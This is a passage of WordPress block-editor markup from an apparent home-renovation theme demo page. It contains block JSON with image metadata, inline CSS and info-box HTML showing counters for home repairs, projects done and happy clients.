2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"a821e40c-d9db-4df8-a874-ba207b78e2ab\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Repair</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"40e7f1d9-3bdc-4663-8f6e-103dd744774b\"} -->\n<style type=\"text/css\"> .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-40e7f1d9-3bdc-4663-8f6e-103dd744774b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"96825ed7-add1-4702-868f-b0437418bf4e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"3c19c43e-2a66-4e93-bc55-5b7f00e5a678\"} -->\n<style type=\"text/css\"> .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"719d3f20-fd00-4b93-8eb7-4c264d4c712b\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"fd8fadce-8cee-456b-9c07-93381eebd5b2\"} -->\n<style type=\"text/css\"> .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fd8fadce-8cee-456b-9c07-93381eebd5b2\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"92918f7a-2108-4235-a165-692ee41bca12\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" 